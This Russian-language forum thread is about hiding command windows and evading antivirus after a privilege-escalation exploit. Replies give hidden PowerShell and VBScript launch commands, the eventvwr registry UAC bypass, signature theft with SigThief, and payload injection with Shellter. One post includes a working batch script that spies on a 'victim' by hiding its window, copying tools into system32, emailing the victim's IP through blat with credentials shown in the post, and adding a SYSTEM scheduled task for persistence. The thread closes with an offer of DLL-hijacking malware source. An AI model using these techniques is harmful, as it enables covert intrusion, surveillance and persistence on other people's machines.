Вопрос о скрытии окна командной строки (Windows)

[giloo]

Всем привет! Вопрос достаточно деликатный для меня. Есть сплоит для поднятия прав в ОС. Он запускает исполняемый файл с возможностью передачи аргументов. Но делает он это с отображением окна (к примеру cmd.exe). Есть ли такое приложение, или особая техника для выполнения команды без различных окон?
Был у меня почти идеальный вариант - eventvwr.exe. Он мало того что выполнял тихонечко команду через реестр, да еще и права админки давал. К сожалению все попытки изменить его ветку реестра (hkcu\software\classes\mscfile\shell\open\commad\*evil) палятся авшками(( Поэтому он отпадает. Пробовала wscript, тоже не то. Скриптам не доверяют ав.
Сразу оговорюсь, пишу на шарпе. Могу собрать тихое приложение сама и дать ему на отработку все команды. Но я выбрала другой вектор атаки, а именно базирующийся на доверенных файлах. А ав не доверяют нонейм exeшкам и прочим скриптам.
Буду рада любым советам и идеям!) Спасибо всем заранее!

 

[Tayler]

Можно попытаться приклеить подпись чужую к файлу https://github.com/secretsquirrel/SigThief

 

[binarymaster]

Но делает он это с отображением окна (к примеру cmd.exe). Есть ли такое приложение, или особая техника для выполнения команды без различных окон?

Просто выполняйте запуск программы с параметром SW_HIDE для скрытия окна (через API -

Ссылка скрыта от гостей

или

Ссылка скрыта от гостей

). Но имейте ввиду, что это не универсальный вариант, не для любого приложения (но для cmd.exe сойдёт).

 

[z3r0c10wn]

Всем привет! Вопрос достаточно деликатный для меня. Есть сплоит для поднятия прав в ОС. Он запускает исполняемый файл с возможностью передачи аргументов. Но делает он это с отображением окна (к примеру cmd.exe). Есть ли такое приложение, или особая техника для выполнения команды без различных окон?
Был у меня почти идеальный вариант - eventvwr.exe. Он мало того что выполнял тихонечко команду через реестр, да еще и права админки давал. К сожалению все попытки изменить его ветку реестра (hkcu\software\classes\mscfile\shell\open\commad\*evil) палятся авшками(( Поэтому он отпадает. Пробовала wscript, тоже не то. Скриптам не доверяют ав.
Сразу оговорюсь, пишу на шарпе. Могу собрать тихое приложение сама и дать ему на отработку все команды. Но я выбрала другой вектор атаки, а именно базирующийся на доверенных файлах. А ав не доверяют нонейм exeшкам и прочим скриптам.
Буду рада любым советам и идеям!) Спасибо всем заранее!

powershell.exe -noprofile -nologo -noninteractiv -w hidden file.exe

 

[giloo]

Всем спасибо большое за ответы)
Но к сожалению ни один из вариантов не подошел(

Можно попытаться приклеить подпись чужую к файлу https://github.com/secretsquirrel/SigThief

Подпись - это хорошо. Но чаще всего ав определяют доверие к файлу по базе хэш сумм. К примеру приложение было запущено 100 000 раз и без всякого подозрительного поведения, даже без подписи автоматически становились доверенными. Проверенная практика.

Просто выполняйте запуск программы с параметром SW_HIDE для скрытия окна (через API -

Ссылка скрыта от гостей

или

Ссылка скрыта от гостей

). Но имейте ввиду, что это не универсальный вариант, не для любого приложения (но для cmd.exe сойдёт).

Не подходит, вы предлагаете написать новое приложение, а это новая хэш сумма :3

powershell.exe -noprofile -nologo -noninteractiv -w hidden file.exe

Вылетает окошко powershell почти сразу исчезает, но жутко палевно(

 

[giloo]

Eventvwr.exe запускает mmc в скрытном режиме через ветку реестра. Никто не знает, есть ли еще подобные приложения в Windows?

 

[binarymaster]

Не подходит, вы предлагаете написать новое приложение, а это новая хэш сумма :3

Эти API ведь можно использовать в VBScript, если мне память не подводит.

 

[z3r0c10wn]

Могу предложить такой вариант - создаем file.vbs

Dim WShell
Set WShell = CreateObject("WScript.Shell")
WShell.Run "Programm.exe", 0
Set WShell = Nothing

Для запуска отдаем:
wscript ""path\to\your vbs file.vbs"

wscript "file.vbs"

в данном случае в VBS так же можно передать параметры

WShell.Run "Programm.exe /argument1 /argument2", 0

Последний параметр обязательно оставляем 0 - так как он и передает значение запуска в скрытом режиме.

 

[giloo]

Как я уже писала, на целевой машине ав блокирует все скрипты и приложения с неизвестной сигнатурой. Я думаю копать в сторону dll hijack. Знает кто-нибудь доверенное приложение от майкрософт с возможностью hijack?

 

[z3r0c10wn]

Для подготовки к подобного рода векторам атаки, необходимо понять на чем вы палитесь -
1) On-access scan
2) In-memory scan
3) Traffic analyze - если поднимаете шелл

В серьезных корп АВ - если ИБшник не халтурничает и нет большого легаси, все эти пункты настроены и работают как надо.

1) Вам нужно простое, легальное и не большое приложение - не больше putty
2) Inject в приложение обфусцированно-криптованой нагрузкой - собирайте в памяти
3) Выполнение нагрузки.
Платный shellter в мануальном режиме в помощь

Описанный выше вариант поможет только от On-access scan и только в некоторых случаях от In-memory
Но опять же - все зависит от параметров in-memory scan.
Если там(на in-memory scan) обычная эвристика - указанный метод её обойдет.
Если вам противостоит маньяк-ИБшник который включил в АВ поведенческий анализ (такое есть к примеру у корп версий Касперского или например у корп версии TrendMicro), вряд ли вы что то сделаете. В таких случаях стоит работать в полях на уровне компрометации сетевых коннектов.
2е - даже если вы обманите на этапе сборки и эксплуатации вашей нагрузки АВ, не забывайте что если сплойт публичный - АВ его обнаружит без проблем.

P.S. и еще момент, если в сети стоит Cisco-firepower в нормальном настроенном виде, то компрометируем систему только локально. Соц-тех вектор.

 

[Valkiria]

Могу дополнить все предыдущие ответы своим вариантом.
Но прежде считаю необходимым обрисовать ситуацию.
Когда-то передо мной стояла задача контролировать изменения динамического IP адреса жертвы.
Сейчас для этого существует специальный софт, но не тогда ))
Я достигла желаемого результата при помощи консольных программ .
Выполнение консольных программ нужно было как-то скрыть, появление командной строки было недопустимо.
Для этого я воспользовалась программой cmdow.exe.
cmdow.exe - это консольная утилита Windows, которая позволяет скрывать командную строку при выполнении консольных программ.
Приведу пример использования утилиты из своего опыта.
Например, батник следующего содержания запустится без появления окна командной строки (содержимое не играет роли, важна только первая строка)

cmdow @ /HID
chcp 1251
md "%SYSTEMROOT%\system32\rm"
move /y "wget.exe" "%SYSTEMROOT%\system32\wget.exe"
move /y "cmdow.exe" "%SYSTEMROOT%\system32\rm\cmdow.exe"
move /y "blat.exe" "%SYSTEMROOT%\system32\blat.exe"
move /y "blat.lib" "%SYSTEMROOT%\system32\blat.lib"
move /y "blat.dll" "%SYSTEMROOT%\system32\blat.dll
move /y "blatdll.h" "%SYSTEMROOT%\system32\blatdll.h
move /y "ip.bat" "%SYSTEMROOT%\system32\rm\ip.bat"
%SYSTEMROOT%\system32\blat.exe -install -server smtp.mail.ru 3 -port 25 -f 333tot@mail.ru -u 333tot@mail.ru -pw kd95757
wget -O - -q icanhazip.com > C:\11.txt
%SYSTEMROOT%\System32\blat.exe C:\11.txt -subject %computername% -to 333tot@mail.ru
del C:\11.txt
schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %systemroot%\system32\rm\ip.bat /f

Обрати внимание на первую строчку батника.

cmdow @ /HID

Именно она обеспечивает сокрытие окна командной строки ))
Естественно, программу необходимо скачать, предварительно погуглив (она бесплатная).

 

[giloo]

Для подготовки к подобного рода векторам атаки, необходимо понять на чем вы палитесь -
1) On-access scan
2) In-memory scan
3) Traffic analyze - если поднимаете шелл

В серьезных корп АВ - если ИБшник не халтурничает и нет большого легаси, все эти пункты настроены и работают как надо.

1) Вам нужно простое, легальное и не большое приложение - не больше putty
2) Inject в приложение обфусцированно-криптованой нагрузкой - собирайте в памяти
3) Выполнение нагрузки.
Платный shellter в мануальном режиме в помощь

Описанный выше вариант поможет только от On-access scan и только в некоторых случаях от In-memory
Но опять же - все зависит от параметров in-memory scan.
Если там(на in-memory scan) обычная эвристика - указанный метод её обойдет.
Если вам противостоит маньяк-ИБшник который включил в АВ поведенческий анализ (такое есть к примеру у корп версий Касперского или например у корп версии TrendMicro), вряд ли вы что то сделаете. В таких случаях стоит работать в полях на уровне компрометации сетевых коннектов.
2е - даже если вы обманите на этапе сборки и эксплуатации вашей нагрузки АВ, не забывайте что если сплойт публичный - АВ его обнаружит без проблем.

P.S. и еще момент, если в сети стоит Cisco-firepower в нормальном настроенном виде, то компрометируем систему только локально. Соц-тех вектор.

В крепости проактивка А так спасибо большое за развернутый совет. Вот как раз таки ищу легальное ПО для инжектов.

Именно она обеспечивает сокрытие окна командной строки ))
Естественно, программу необходимо скачать, предварительно погуглив (она бесплатная).

Уу) скачала я ее) мой дохлый ав ее сразу убил)) прям пристрелил)

 

[Valkiria]

Уу) скачала я ее) мой дохлый ав ее сразу убил)) прям пристрелил)

Действительно, результат сканирования просто поражает ))

Ссылка скрыта от гостей

В этом случае мы имеем дело с явлением, которое я описывала в этой статье ))
Пять лет назад антивирусы были безразличны к этой программе.
Времена меняются.

 

[giloo]

Действительно, результат сканирования просто поражает ))

Я тоже в пала в удивление когда опробовала этот метод)

В общем... Нашла я метод, чуть кони не двинула пока реализовала его. В итоге как и говорила, решила hijackингом. Есть доверенная апа с подписью от винды, и ее злая длл :3
Всем спасибо большое за попытку помочь!))
Если кому нужно, могу скинуть(в личку) творение с исходным кодом. Хаппи Хак!)